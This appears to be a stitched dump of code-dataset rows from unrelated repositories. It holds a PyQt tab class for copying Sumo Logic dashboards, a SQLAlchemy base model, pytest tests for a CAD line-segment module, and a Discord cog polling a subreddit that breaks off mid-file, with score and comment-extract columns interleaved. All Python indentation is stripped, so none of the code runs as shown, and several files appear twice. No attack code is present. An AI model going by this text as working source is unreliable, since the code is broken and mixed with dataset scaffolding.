for query_string_replacement in query_string_replacement_list:
if query_string_replacement['from'] in metrics_query['query']:
metrics_query['query'] = metrics_query['query'].replace(
str(query_string_replacement['from']),
str(query_string_replacement['to']))
break
panel['metricsQueries'][querynum] = metrics_query
else: # if panel is a log panel
for query_string_replacement in query_string_replacement_list:
if query_string_replacement['from'] in panel['queryString']:
panel['queryString'] = panel['queryString'].replace(
str(query_string_replacement['from']),
str(query_string_replacement['to']))
break
exported_json['panels'][panelnum] = panel
return exported_json
elif exported_json['type'] == "DashboardV2SyncDefinition": # if it's a new style dashboard
for panelnum, panel in enumerate(exported_json['panels'], start=0):
for querynum, query in enumerate(panel['queries']):
for query_string_replacement in query_string_replacement_list:
if query_string_replacement['from'] in query['queryString']:
query['queryString'] = query['queryString'].replace(
str(query_string_replacement['from']),
str(query_string_replacement['to']))
break
panel['queries'][querynum] = query
exported_json['panels'][panelnum] = panel
return exported_json
elif exported_json['type'] == "FolderSyncDefinition":
children = []
for object in exported_json['children']:
children.append(self.recurse_replace_query_strings(query_string_replacement_list, object))
exported_json['children'] = children
return exported_json
def clear_filters(self, list_widget):
pass
@exception_and_error_handling
def update_item_list(self, list_widget, adapter, path_label=None):
mode_param = {'mode': list_widget.mode}
merged_params = {**list_widget.params, **mode_param}
contents = adapter.list(params=merged_params)
logger.debug(f'[Tab Base Class] Updating item list, got: {contents}')
self.update_list_widget(list_widget, adapter, contents, path_label=path_label)
self.clear_filters(list_widget)
def create_list_widget_item(self, item):
item_name = str(item['name'])
if ('contentType' in item) and (item['contentType'] == 'Folder'):
list_item = QtWidgets.QListWidgetItem(self.icons['Folder'], item_name)
elif ('itemType' in item) and (item['itemType'] == 'Folder'):
list_item = QtWidgets.QListWidgetItem(self.icons['Folder'], item_name)
else:
list_item = QtWidgets.QListWidgetItem(item_name)
return list_item
def update_list_widget(self, list_widget, adapter, payload, path_label=None):
try:
list_widget.clear()
count = 0
for item in payload:
list_item = self.create_list_widget_item(item)
# attach the details about the item to the entry in listwidget, this makes life much easier
list_item.details = item
list_widget.addItem(list_item) # populate the list widget in the GUI with no icon (fallthrough)
count += 1
if path_label:
path_label.setText(adapter.get_current_path())
list_widget.updated = True
except Exception as e:
list_widget.clear()
list_widget.updated = False
logger.exception(e)
return
@exception_and_error_handling
def find_replace_metadata(self, adapter, payload):
logger.debug(f"[{self.tab_name}] Replacing Metadata")
source_metadata = []
for item in payload:
# find all the keys in our item that contain queries
query_list = self.find_keys(item, 'queryText')
query_list = query_list + self.find_keys(item, 'query')
query_list = query_list + self.find_keys(item, 'queryString')
# extract the source category from our list of queries
for query in query_list:
source_metadata = source_metadata + re.findall(r'_sourceCategory\s*=\s*\\?\"?([^\s^")]*)\"?',
query)
# de-duplicate the list of source categories
unique_source_metadata = list(set(source_metadata))
# if the destination is a Sumo Instance then query for available metadata tags
if adapter.is_sumo_adapter():
fromtime = str(QtCore.QDateTime.currentDateTime().addSecs(-3600).toString(QtCore.Qt.ISODate))
totime = str(QtCore.QDateTime.currentDateTime().toString(QtCore.Qt.ISODate))
# We query the destination org to get a sample of active source categories
query = r'* | count by _sourceCategory | fields _sourceCategory'
results = adapter.sumo_search_records(query, from_time=fromtime, to_time=totime,
timezone='UTC', by_receipt_time=False)
records = results['payload']
destination_metadata = []
for record in records:
logger.debug(f'Found Source Category:{record}')
destination_metadata.append(record['map']['_sourcecategory'])
unique_destination_metadata = list(set(destination_metadata))
# if the destination is not a Sumo instance then leave the destination metadata tag list empty
else:
unique_destination_metadata = []
dialog = FindReplaceCopyDialog(unique_source_metadata, unique_destination_metadata)
dialog.exec()
dialog.show()
if str(dialog.result()) == '1':
replacelist = dialog.getresults()
logger.debug(f'Metadata replacement list: {replacelist}')
dialog.close()
if len(replacelist) > 0:
new_payload = []
for item in payload:
new_payload.append(self.recurse_replace_query_strings(replacelist, item))
else:
new_payload = payload
return new_payload
else:
return []
@exception_and_error_handling
def begin_copy_content(self,
source_list_widget,
destination_list_widget,
source_adapter,
destination_adapter,
params):
selected_items = source_list_widget.selectedItems()
num_selected_items = len(selected_items)
if num_selected_items < 1: return # make sure something was selected
logger.debug(f"[{self.tab_name}] Exporting Item(s) {selected_items}")
self.num_threads = num_selected_items
self.num_successful_threads = 0
self.copy_export_results = []
self.export_progress = ProgressDialog('Exporting items...', 0, self.num_threads, self.mainwindow.threadpool, self.mainwindow)
self.workers = []
base_params = {'destination_list_widget': destination_list_widget,
'destination_adapter': destination_adapter,
'read_mode': source_list_widget.mode,
'write_mode': destination_list_widget.mode}
merged_params = {**base_params, **params}
merged_params = {**merged_params, **source_list_widget.params}
for index, selected_item in enumerate(selected_items):
if 'id' in selected_item.details:
item_id = selected_item.details['id']
else:
item_id = None
logger.debug(f"Creating copy thread for item {selected_item.details['name']}")
self.workers.append(Worker(source_adapter.export_item,
selected_item.details['name'],
item_id,
params=merged_params
))
self.workers[index].signals.finished.connect(self.export_progress.increment)
self.workers[index].signals.result.connect(self.merge_begin_copy_results)
self.mainwindow.threadpool.start(self.workers[index])
return
def merge_begin_copy_results(self, result):
if result['status'] == 'SUCCESS':
self.num_successful_threads += 1
self.copy_export_results.append(result['payload'])
else:
self.mainwindow.threadpool.clear()
logger.info(f"ERROR: {result['exception']} on line: {result['line_number']}")
self.mainwindow.errorbox('Something went wrong:\n\n' + result['exception'])
if self.num_successful_threads == self.num_threads:
if result['params']['replace_source_categories']:
item_list = self.find_replace_metadata(result['params']['destination_adapter'], self.copy_export_results)
else:
item_list = self.copy_export_results
if len(item_list) == 0: return
logger.debug(f"[{self.tab_name}] Importing Item(s)")
self.num_threads = len(item_list)
self.num_successful_threads = 0
self.copy_export_results = []
self.import_progress = ProgressDialog('Importing items...', 0, self.num_threads, self.mainwindow.threadpool,
self.mainwindow)
self.workers = []
for index, item in enumerate(item_list):
if 'name' in item:
logger.debug(f"Creating copy thread for item {item['name']}")
self.workers.append(Worker(result['params']['destination_adapter'].import_item,
item['name'],
item,
params=result['params']
))
self.workers[index].signals.finished.connect(self.import_progress.increment)
self.workers[index].signals.result.connect(self.merge_results_update_target)
self.mainwindow.threadpool.start(self.workers[index])
def merge_results_update_target(self, result):
if result['status'] == 'SUCCESS':
self.num_successful_threads += 1
else:
self.mainwindow.threadpool.clear()
logger.info(f"ERROR: {result['exception']} on line: {result['line_number']}")
self.mainwindow.errorbox('Something went wrong:\n\n' + result['exception'])
if self.num_successful_threads == self.num_threads:
self.update_item_list(result['params']['destination_list_widget'], result['adapter'])
@exception_and_error_handling
def delete_item(self, list_widget, adapter):
selected_items = list_widget.selectedItems()
if len(selected_items) < 1: return # make sure something was selected
logger.debug(f"[{self.tab_name}] Deleting Item(s) {selected_items}")
message = "You are about to delete the following item(s):\n\n"
for selected_item in selected_items:
message = message + str(selected_item.text()) + "\n"
message = message + '''
This is exceedingly DANGEROUS!!!!
Please be VERY, VERY, VERY sure you want to do this!
You could lose quite a bit of work if you delete the wrong thing(s).
If you are absolutely sure, type "DELETE" in the box below.
'''
text, result = QtWidgets.QInputDialog.getText(self, 'Warning!!', message)
if (result and (str(text) == 'DELETE')):
self.num_threads = len(selected_items)
self.num_successful_threads = 0
self.progress = ProgressDialog('Deleting items...', 0, self.num_threads, self.mainwindow.threadpool,
self.mainwindow)
self.workers = []
params = {'destination_list_widget': list_widget,
'destination_adapter': adapter,
'mode': list_widget.mode}
for index, selected_item in enumerate(selected_items):
item_name = selected_item.details['name']
if 'id' in selected_item.details:
item_id = selected_item.details['id']
else:
item_id = None
logger.debug(f"Creating delete thread for item {item_name}")
self.workers.append(Worker(adapter.delete,
item_name,
item_id,
params=params))
self.workers[index].signals.finished.connect(self.progress.increment)
self.workers[index].signals.result.connect(self.merge_results_update_target)
self.mainwindow.threadpool.start(self.workers[index])
@exception_and_error_handling
def view_json(self, list_widget, adapter):
selected_items = list_widget.selectedItems()
if len(selected_items) < 1: return # make sure something was selected
logger.debug(f"[Content] Viewing JSON {selected_items}")
self.num_threads = len(selected_items)
self.num_successful_threads = 0
self.progress = ProgressDialog('Viewing items...', 0, self.num_threads, self.mainwindow.threadpool, self.mainwindow)
self.json_text = ''
self.workers = []
params = {'read_mode': list_widget.mode,
'list_widget': list_widget}
for index, selected_item in enumerate(selected_items):
item_name = selected_item.details['name']
if 'id' in selected_item.details:
item_id = selected_item.details['id']
else:
item_id = None
logger.debug(f"Creating view thread for item {item_name}")
self.workers.append(Worker(adapter.get,
item_name,
item_id,
params=params))
self.workers[index].signals.finished.connect(self.progress.increment)
self.workers[index].signals.result.connect(self.merge_view_json_results)
self.mainwindow.threadpool.start(self.workers[index])
def merge_view_json_results(self, result):
if result['status'] == 'SUCCESS':
self.num_successful_threads += 1
self.json_text = self.json_text + json.dumps(result['payload'], indent=4, sort_keys=True) + '\n\n'
else:
self.mainwindow.threadpool.clear()
logger.info(f"ERROR: {result['exception']} on line: {result['line_number']}")
self.mainwindow.errorbox('Something went wrong:\n\n' + result['exception'])
if self.num_successful_threads == self.num_threads:
self.json_window = ShowTextDialog('JSON', self.json_text, self.mainwindow.basedir)
self.json_window.show()
@exception_and_error_handling
def create_folder(self, list_widget, adapter):
if list_widget.updated:
message = '''
Please enter the name of the folder you wish to create:
'''
text, result = QtWidgets.QInputDialog.getText(self, 'Create Folder...', message)
if result:
for item in list_widget.selectedItems():
if item.details['name'] == str(text):
self.mainwindow.errorbox('That Directory Name Already Exists!')
return False
logger.debug(f"[{self.tab_name}] Creating New Folder {str(text)}")
params = {'mode': list_widget.mode}
result = adapter.create_folder(str(text), list_widget, params=params)
if result:
self.update_item_list(list_widget, adapter)
return True
else:
return False
@exception_and_error_handling
def double_clicked_item(self, list_widget, adapter, item, path_label=None):
logger.debug(f"[{self.tab_name}] Going Down One Folder {str(item.details['name'])}")
mode_param = {'mode': list_widget.mode}
merged_params = {**list_widget.params, **mode_param}
result = adapter.down(item.details['name'], params=merged_params)
if result:
self.update_item_list(list_widget, adapter, path_label=path_label)
@exception_and_error_handling
def go_to_parent_dir(self, list_widget, adapter, path_label=None):
if list_widget.updated:
mode_param = {'mode': list_widget.mode}
merged_params = {**list_widget.params, **mode_param}
result = adapter.up(params=merged_params)
if result:
logger.debug(f"[{self.tab_name}] Going Up One folder")
self.update_item_list(list_widget, adapter, path_label=path_label)
class StandardTab(BaseTab):
def __init__(self, mainwindow, copy_override=False):
super(StandardTab, self).__init__(mainwindow)
standard_tab_ui = os.path.join(self.mainwindow.basedir, 'data/standard_tab.ui')
uic.loadUi(standard_tab_ui, self)
self.listWidgetLeft.filter = self.lineEditSearchLeft
self.listWidgetRight.filter = self.lineEditSearchRight
self.pushButtonUpdateLeft.clicked.connect(lambda: self.update_item_list(
self.listWidgetLeft,
self.left_adapter,
path_label=self.labelPathLeft
))
self.pushButtonUpdateRight.clicked.connect(lambda: self.update_item_list(
self.listWidgetRight,
self.right_adapter,
path_label=self.labelPathRight
))
self.pushButtonParentDirLeft.clicked.connect(lambda: self.go_to_parent_dir(
self.listWidgetLeft,
self.left_adapter,
path_label=self.labelPathLeft
))
self.pushButtonParentDirRight.clicked.connect(lambda: self.go_to_parent_dir(
self.listWidgetRight,
self.right_adapter,
path_label=self.labelPathRight
))
self.lineEditSearchLeft.textChanged.connect(lambda: self.set_listwidget_filter(
self.listWidgetLeft,
self.lineEditSearchLeft.text()
))
self.lineEditSearchRight.textChanged.connect(lambda: self.set_listwidget_filter(
self.listWidgetRight,
self.lineEditSearchRight.text()
))
self.listWidgetLeft.itemDoubleClicked.connect(lambda item: self.double_clicked_item(
self.listWidgetLeft,
self.left_adapter,
item,
path_label=self.labelPathLeft
))
self.listWidgetRight.itemDoubleClicked.connect(lambda item: self.double_clicked_item(
self.listWidgetRight,
self.right_adapter,
item,
path_label=self.labelPathRight
))
self.pushButtonNewFolderLeft.clicked.connect(lambda: self.create_folder(
self.listWidgetLeft,
self.left_adapter
))
self.pushButtonNewFolderRight.clicked.connect(lambda: self.create_folder(
self.listWidgetRight,
self.right_adapter
))
self.pushButtonDeleteLeft.clicked.connect(lambda: self.delete_item(
self.listWidgetLeft,
self.left_adapter
))
self.pushButtonDeleteRight.clicked.connect(lambda: self.delete_item(
self.listWidgetRight,
self.right_adapter
))
if not copy_override:
self.pushButtonCopyLeftToRight.clicked.connect(lambda: self.begin_copy_content(
self.listWidgetLeft,
self.listWidgetRight,
self.left_adapter,
self.right_adapter,
{'replace_source_categories': False}
))
self.pushButtonCopyRightToLeft.clicked.connect(lambda: self.begin_copy_content(
self.listWidgetRight,
self.listWidgetLeft,
self.right_adapter,
self.left_adapter,
{'replace_source_categories': False}
))
self.pushButtonJSONLeft.clicked.connect(lambda: self.view_json(
self.listWidgetLeft,
self.left_adapter
))
self.pushButtonJSONRight.clicked.connect(lambda: self.view_json(
self.listWidgetRight,
self.right_adapter
))
def clear_filters(self, list_widget):
list_widget.filter.clear()
def reset_stateful_objects(self, side='both'):
super(StandardTab, self).reset_stateful_objects(side=side)
if self.left:
self.listWidgetLeft.clear()
self.listWidgetLeft.currentcontent = {}
self.listWidgetLeft.updated = False
self.listWidgetLeft.mode = None
self.labelPathLeft.clear()
self.lineEditSearchLeft.clear()
if self.left_creds['service'] == "FILESYSTEM:":
self.pushButtonParentDirLeft.setEnabled(True)
self.pushButtonNewFolderLeft.setEnabled(True)
self.left_adapter = FilesystemAdapter(self.left_creds, 'left', self.mainwindow)
elif ':' not in self.left_creds['service']:
self.pushButtonParentDirLeft.setEnabled(False)
self.pushButtonNewFolderLeft.setEnabled(False)
if self.right:
self.listWidgetRight.clear()
self.listWidgetRight.currentcontent = {}
self.listWidgetRight.updated = False
self.listWidgetRight.mode = None
self.labelPathRight.clear()
self.lineEditSearchRight.clear()
if self.right_creds['service'] == "FILESYSTEM:":
self.pushButtonParentDirRight.setEnabled(True)
self.pushButtonNewFolderRight.setEnabled(True)
self.right_adapter = FilesystemAdapter(self.right_creds, 'right', self.mainwindow)
if ':' not in self.right_creds['service']:
self.pushButtonParentDirRight.setEnabled(False)
self.pushButtonNewFolderRight.setEnabled(False) | en | 0.833776 | # setup static elements # set up the list of destination categories to populate into the comboboxes # Create 1 set of (checkbox, label, combobox per fromcategory # Creata a vertical scroll area with a grid layout inside with label headers #self.scrollArea.setFixedHeight(400) # Override the font # things needed for multithreading # Thanks Stackoverflow. Yoink! Pull all values of specified key from nested JSON. Recursively search for values of key in JSON tree. # there can be multiple query strings so we have an extra loop here # if panel is a log panel # if it's a new style dashboard # attach the details about the item to the entry in listwidget, this makes life much easier # populate the list widget in the GUI with no icon (fallthrough) # find all the keys in our item that contain queries # extract the source category from our list of queries # de-duplicate the list of source categories # if the destination is a Sumo Instance then query for available metadata tags # We query the destination org to get a sample of active source categories # if the destination is not a Sumo instance then leave the destination metadata tag list empty # make sure something was selected # make sure something was selected This is exceedingly DANGEROUS!!!! Please be VERY, VERY, VERY sure you want to do this! You could lose quite a bit of work if you delete the wrong thing(s). If you are absolutely sure, type "DELETE" in the box below. # make sure something was selected Please enter the name of the folder you wish to create: | 2.209332 | 2 |
tracker/app/utils/base_model.py | JelteF/bottor | 4 | 6616716 | <reponame>JelteF/bottor<filename>tracker/app/utils/base_model.py
"""base_model.py - Some things done to spare time.
Extra functionality that is used by all models. It extends db.Model with extra
functions.
"""
from app import db
from app.utils import serialize_sqla
from datetime import datetime
import dateutil.parser
class BaseEntity(object):
__table_args__ = {'sqlite_autoincrement': True}
# Only json items if explicitly defined, and just print id when not
# defined.
jsons = None
json_relationships = None
prints = ('id',)
# Columns that every model needs.
id = db.Column(db.Integer, primary_key=True)
created = db.Column(db.DateTime, default=datetime.now)
modified = db.Column(db.DateTime, default=datetime.now,
onupdate=datetime.now)
def __repr__(self):
"""Used by print to print a model at server side. It uses the prints
attribute from the object to determine what values to print."""
first = True
string = '<%s(' % (type(self).__name__)
for attr in self.prints:
string += (', ' if not first else '') + '"%s"' % (getattr(self,
attr))
first = False
string += ')>'
return string
# Function to
def to_dict(self):
"""Convert a sqlalchemy object instance to a dictionary.
This is needed for json serialization of an object. The jsons attribute
is used to determine what values to serialize (password hashes and such
should not in there).
"""
attrs = {}
set_jsons = False
if not self.jsons:
self.jsons = (column.name for column in self.__table__.columns)
set_jsons = True
for column in self.jsons:
value = serialize_sqla(getattr(self, column))
attrs[column] = value
if self.json_relationships:
for rel in self.json_relationships:
attrs[rel] = serialize_sqla(getattr(self, rel).all())
if set_jsons:
self.jsons = None
return attrs
@classmethod
def merge_dict(cls, obj, relationships={}):
"""Merge dictionary as object."""
# Get the correct entry from the database.
if 'id' in obj and obj['id']:
entry = cls.by_id(obj['id'])
if not entry:
return None
# If the dict doesn't contain id it means the entry does not exist yet.
else:
entry = cls()
# Remove id, created and modified, since those are things you want to
# automaticaly update.
obj.pop('id', None)
obj.pop('created', None)
obj.pop('modified', None)
column_names = tuple(column.name for column in cls.__table__.columns)
# Update all values from the dict that exist as a column or a
# relationship.
for key, value in obj.items():
if key in column_names:
columntype = str(cls.__table__.columns[key].type)
if columntype == 'DATE' and value is not None:
if isinstance(value, str):
value = dateutil.parser.parse(value)
elif columntype == 'TIME' and value is not None:
if isinstance(value, str):
value = dateutil.parser.parse(value).time()
setattr(entry, key, value)
elif key in relationships:
setattr(entry, key, relationships[key].by_ids(value))
return entry
# For future proofing use new_dict when creating new entries, so it could
# become a separate function if needed.
new_dict = merge_dict
@classmethod
def by_id(cls, _id):
"""Get entry by id."""
return cls.query.filter_by(id=_id).first()
@classmethod
def by_ids(cls, ids):
"""Get entries by id list."""
try:
return db.session.query(cls).filter(cls.id.in_(ids)).all()
except:
return []
| """base_model.py - Some things done to spare time.
Extra functionality that is used by all models. It extends db.Model with extra
functions.
"""
from app import db
from app.utils import serialize_sqla
from datetime import datetime
import dateutil.parser
class BaseEntity(object):
__table_args__ = {'sqlite_autoincrement': True}
# Only json items if explicitly defined, and just print id when not
# defined.
jsons = None
json_relationships = None
prints = ('id',)
# Columns that every model needs.
id = db.Column(db.Integer, primary_key=True)
created = db.Column(db.DateTime, default=datetime.now)
modified = db.Column(db.DateTime, default=datetime.now,
onupdate=datetime.now)
def __repr__(self):
"""Used by print to print a model at server side. It uses the prints
attribute from the object to determine what values to print."""
first = True
string = '<%s(' % (type(self).__name__)
for attr in self.prints:
string += (', ' if not first else '') + '"%s"' % (getattr(self,
attr))
first = False
string += ')>'
return string
# Function to
def to_dict(self):
"""Convert a sqlalchemy object instance to a dictionary.
This is needed for json serialization of an object. The jsons attribute
is used to determine what values to serialize (password hashes and such
should not in there).
"""
attrs = {}
set_jsons = False
if not self.jsons:
self.jsons = (column.name for column in self.__table__.columns)
set_jsons = True
for column in self.jsons:
value = serialize_sqla(getattr(self, column))
attrs[column] = value
if self.json_relationships:
for rel in self.json_relationships:
attrs[rel] = serialize_sqla(getattr(self, rel).all())
if set_jsons:
self.jsons = None
return attrs
@classmethod
def merge_dict(cls, obj, relationships={}):
"""Merge dictionary as object."""
# Get the correct entry from the database.
if 'id' in obj and obj['id']:
entry = cls.by_id(obj['id'])
if not entry:
return None
# If the dict doesn't contain id it means the entry does not exist yet.
else:
entry = cls()
# Remove id, created and modified, since those are things you want to
# automaticaly update.
obj.pop('id', None)
obj.pop('created', None)
obj.pop('modified', None)
column_names = tuple(column.name for column in cls.__table__.columns)
# Update all values from the dict that exist as a column or a
# relationship.
for key, value in obj.items():
if key in column_names:
columntype = str(cls.__table__.columns[key].type)
if columntype == 'DATE' and value is not None:
if isinstance(value, str):
value = dateutil.parser.parse(value)
elif columntype == 'TIME' and value is not None:
if isinstance(value, str):
value = dateutil.parser.parse(value).time()
setattr(entry, key, value)
elif key in relationships:
setattr(entry, key, relationships[key].by_ids(value))
return entry
# For future proofing use new_dict when creating new entries, so it could
# become a separate function if needed.
new_dict = merge_dict
@classmethod
def by_id(cls, _id):
"""Get entry by id."""
return cls.query.filter_by(id=_id).first()
@classmethod
def by_ids(cls, ids):
"""Get entries by id list."""
try:
return db.session.query(cls).filter(cls.id.in_(ids)).all()
except:
return [] | en | 0.88574 | base_model.py - Some things done to spare time. Extra functionality that is used by all models. It extends db.Model with extra functions. # Only json items if explicitly defined, and just print id when not # defined. # Columns that every model needs. Used by print to print a model at server side. It uses the prints attribute from the object to determine what values to print. # Function to Convert a sqlalchemy object instance to a dictionary. This is needed for json serialization of an object. The jsons attribute is used to determine what values to serialize (password hashes and such should not in there). Merge dictionary as object. # Get the correct entry from the database. # If the dict doesn't contain id it means the entry does not exist yet. # Remove id, created and modified, since those are things you want to # automaticaly update. # Update all values from the dict that exist as a column or a # relationship. # For future proofing use new_dict when creating new entries, so it could # become a separate function if needed. Get entry by id. Get entries by id list. | 3.327711 | 3 |
tests/test_lines.py | rsmith-nl/nctools | 3 | 6616717 | # file: test-lines.py
# vim:fileencoding=utf-8:ft=python
#
# Author: <NAME> <<EMAIL>>
# Created: 2016-03-28 12:45:47 +0200
# Last modified: 2018-01-23 22:02:50 +0100
"""Tests for the lines module."""
import sys
sys.path.insert(1, '.')
from nctools import lines # noqa
def test_mksegments_line():
entities = [
(
(0, 'LINE'), (5, '359'), (330, '475'), (100, 'AcDbEntity'), (8, 'deel 1'),
(100, 'AcDbLine'), (10, '999.9999999999984'), (20, '100.0'), (30, '0.0'),
(11, '1100.0'), (21, '100.0'), (31, '0.0')
), (
(0, 'LINE'), (5, '35A'), (330, '475'), (100, 'AcDbEntity'), (8, 'deel 1'),
(100, 'AcDbLine'), (10, '1100.0'), (20, '100.0'), (30, '0.0'), (11, '1100.0'),
(21, '600.0'), (31, '0.0')
), (
(0, 'LINE'), (5, '35B'), (330, '475'), (100, 'AcDbEntity'), (8, 'deel 1'),
(100, 'AcDbLine'), (10, '1100.0'), (20, '600.0'), (30, '0.0'), (11, '1000.0000001'),
(21, '600.0'), (31, '0.0')
)
]
segments = lines.mksegments(entities)
assert segments == [
[(1000, 100), (1100, 100)], [(1100, 100), (1100, 600)], [(1100, 600), (1000, 600)]
]
def test_mksegments_arc():
arc = [
(
(0, 'ARC'), (5, '35F'), (330, '475'), (100, 'AcDbEntity'), (8, 'deel 1'),
(100, 'AcDbCircle'), (10, '900.0'), (20, '349.9999999999998'), (30, '0.0'),
(40, '800.0'), (100, 'AcDbArc'), (50, '169.1930771251396'), (51, '190.8069228748603')
)
]
rv = lines.mksegments(arc)
ev = [
[
(114.188, 500.0), (106.316, 450.331), (101.581, 400.265), (100.0, 350.0),
(101.581, 299.735), (106.316, 249.669), (114.188, 200.0)
]
]
assert rv[0] == ev[0]
def test_combine_segments():
segments = [
[(0, 0), (100, 0)], [(0, 50), (50, 0)], [(100, 0), (100, 100)], [(100, 100), (0, 100)],
[(0, 100), (0, 0)]
]
rv = lines.combine_segments(segments)
ev = ([[(0, 0), (100, 0), (100, 100), (0, 100), (0, 0)]], [[(0, 50), (50, 0)]])
assert rv[0][0] == ev[0][0]
assert rv[1][0] == ev[1][0]
def test_closed():
segment = [(0, 0), (100, 0), (100, 100), (0, 100), (0, 0)]
assert lines.closed(segment) is True
def test_length():
openseg = [(0, 0), (100, 0), (100, 100)]
closedseg = [(0, 0), (100, 0), (100, 100), (0, 100), (0, 0)]
assert lines.length(openseg) == 200
assert lines.length(closedseg) == 400
def test_setstart():
closedseg = [(0, 0), (100, 0), (100, 100), (0, 100), (0, 0)]
lines.setstart(closedseg, (100, 100))
ev = [(100, 100), (0, 100), (0, 0), (100, 0), (100, 100)]
assert closedseg == ev
| # file: test-lines.py
# vim:fileencoding=utf-8:ft=python
#
# Author: <NAME> <<EMAIL>>
# Created: 2016-03-28 12:45:47 +0200
# Last modified: 2018-01-23 22:02:50 +0100
"""Tests for the lines module."""
import sys
sys.path.insert(1, '.')
from nctools import lines # noqa
def test_mksegments_line():
entities = [
(
(0, 'LINE'), (5, '359'), (330, '475'), (100, 'AcDbEntity'), (8, 'deel 1'),
(100, 'AcDbLine'), (10, '999.9999999999984'), (20, '100.0'), (30, '0.0'),
(11, '1100.0'), (21, '100.0'), (31, '0.0')
), (
(0, 'LINE'), (5, '35A'), (330, '475'), (100, 'AcDbEntity'), (8, 'deel 1'),
(100, 'AcDbLine'), (10, '1100.0'), (20, '100.0'), (30, '0.0'), (11, '1100.0'),
(21, '600.0'), (31, '0.0')
), (
(0, 'LINE'), (5, '35B'), (330, '475'), (100, 'AcDbEntity'), (8, 'deel 1'),
(100, 'AcDbLine'), (10, '1100.0'), (20, '600.0'), (30, '0.0'), (11, '1000.0000001'),
(21, '600.0'), (31, '0.0')
)
]
segments = lines.mksegments(entities)
assert segments == [
[(1000, 100), (1100, 100)], [(1100, 100), (1100, 600)], [(1100, 600), (1000, 600)]
]
def test_mksegments_arc():
arc = [
(
(0, 'ARC'), (5, '35F'), (330, '475'), (100, 'AcDbEntity'), (8, 'deel 1'),
(100, 'AcDbCircle'), (10, '900.0'), (20, '349.9999999999998'), (30, '0.0'),
(40, '800.0'), (100, 'AcDbArc'), (50, '169.1930771251396'), (51, '190.8069228748603')
)
]
rv = lines.mksegments(arc)
ev = [
[
(114.188, 500.0), (106.316, 450.331), (101.581, 400.265), (100.0, 350.0),
(101.581, 299.735), (106.316, 249.669), (114.188, 200.0)
]
]
assert rv[0] == ev[0]
def test_combine_segments():
segments = [
[(0, 0), (100, 0)], [(0, 50), (50, 0)], [(100, 0), (100, 100)], [(100, 100), (0, 100)],
[(0, 100), (0, 0)]
]
rv = lines.combine_segments(segments)
ev = ([[(0, 0), (100, 0), (100, 100), (0, 100), (0, 0)]], [[(0, 50), (50, 0)]])
assert rv[0][0] == ev[0][0]
assert rv[1][0] == ev[1][0]
def test_closed():
segment = [(0, 0), (100, 0), (100, 100), (0, 100), (0, 0)]
assert lines.closed(segment) is True
def test_length():
openseg = [(0, 0), (100, 0), (100, 100)]
closedseg = [(0, 0), (100, 0), (100, 100), (0, 100), (0, 0)]
assert lines.length(openseg) == 200
assert lines.length(closedseg) == 400
def test_setstart():
closedseg = [(0, 0), (100, 0), (100, 100), (0, 100), (0, 0)]
lines.setstart(closedseg, (100, 100))
ev = [(100, 100), (0, 100), (0, 0), (100, 0), (100, 100)]
assert closedseg == ev
| en | 0.496929 | # file: test-lines.py # vim:fileencoding=utf-8:ft=python # # Author: <NAME> <<EMAIL>> # Created: 2016-03-28 12:45:47 +0200 # Last modified: 2018-01-23 22:02:50 +0100 Tests for the lines module. # noqa | 2.276261 | 2 |
modules/reddit_feed/cog.py | DenverCoder1/professor-vector-discord-bot | 1 | 6616718 | <reponame>DenverCoder1/professor-vector-discord-bot
import datetime
import time
from discord.ext.tasks import loop
from discord.ext import commands
import asyncpraw
from asyncprawcore.exceptions import AsyncPrawcoreException
import asyncpraw.exceptions
from modules.reddit_feed.reddit_post import RedditPost
import config
# Reddit feed settings
CHECK_INTERVAL = 5 # seconds to wait before checking again
SUBMISSION_LIMIT = 5 # number of submissions to check
# initialize AsyncPraw reddit api
reddit = asyncpraw.Reddit(
client_id=config.CLIENT_ID,
client_secret=config.CLIENT_SECRET,
password=<PASSWORD>,
user_agent=f"{config.ME} Bot",
username=config.ME,
)
class RedditFeedCog(commands.Cog, name="Reddit Feed"):
"""Checks for `resend` command and starts Reddit feed loop to check submissions"""
def __init__(self, bot):
self.bot = bot
@commands.Cog.listener()
async def on_ready(self):
"""When discord is connected"""
# Start Reddit loop
self.reddit_feed.start()
def is_in_guild(guild_id):
"""check that command is in a guild"""
async def predicate(ctx):
return ctx.guild and ctx.guild.id == guild_id
return commands.check(predicate)
@commands.command(name="resend")
@commands.has_permissions(administrator=True)
@is_in_guild(config.GUILD_ID)
async def resend(self, ctx):
"""Command to resend the last post again.
Invoked with !resend"""
# log command in console
print("Received resend command")
# respond to command
await ctx.send("Resending last announcement!")
# check for last submission in subreddit
subreddit = await reddit.subreddit(config.SUB)
async for submission in subreddit.new(limit=1):
# process submission
await RedditPost(self.bot, submission).process_post()
@loop(seconds=CHECK_INTERVAL)
async def reddit_feed(self):
"""loop every few seconds to check for new submissions"""
try:
# check for new submission in subreddit
subreddit = await reddit.subreddit(config.SUB)
async for submission in subreddit.new(limit=SUBMISSION_LIMIT):
# check if the post has been seen before
if not submission.saved:
# save post to mark as seen
await submission.save()
# process submission
await RedditPost(self.bot, submission).process_post()
except AsyncPrawcoreException as err:
print(f"EXCEPTION: AsyncPrawcoreException. {err}")
time.sleep(10)
@reddit_feed.before_loop
async def reddit_feed_init(self):
"""print startup info before reddit feed loop begins"""
print(f"Logged in: {str(datetime.datetime.now())[:-7]}")
print(f"Timezone: {time.tzname[time.localtime().tm_isdst]}")
print(f"Subreddit: {config.SUB}")
print(f"Checking {SUBMISSION_LIMIT} posts every {CHECK_INTERVAL} seconds")
def setup(bot):
bot.add_cog(RedditFeedCog(bot))
| import datetime
import time
from discord.ext.tasks import loop
from discord.ext import commands
import asyncpraw
from asyncprawcore.exceptions import AsyncPrawcoreException
import asyncpraw.exceptions
from modules.reddit_feed.reddit_post import RedditPost
import config
# Reddit feed settings
CHECK_INTERVAL = 5 # seconds to wait before checking again
SUBMISSION_LIMIT = 5 # number of submissions to check
# initialize AsyncPraw reddit api
reddit = asyncpraw.Reddit(
client_id=config.CLIENT_ID,
client_secret=config.CLIENT_SECRET,
password=<PASSWORD>,
user_agent=f"{config.ME} Bot",
username=config.ME,
)
class RedditFeedCog(commands.Cog, name="Reddit Feed"):
"""Checks for `resend` command and starts Reddit feed loop to check submissions"""
def __init__(self, bot):
self.bot = bot
@commands.Cog.listener()
async def on_ready(self):
"""When discord is connected"""
# Start Reddit loop
self.reddit_feed.start()
def is_in_guild(guild_id):
"""check that command is in a guild"""
async def predicate(ctx):
return ctx.guild and ctx.guild.id == guild_id
return commands.check(predicate)
@commands.command(name="resend")
@commands.has_permissions(administrator=True)
@is_in_guild(config.GUILD_ID)
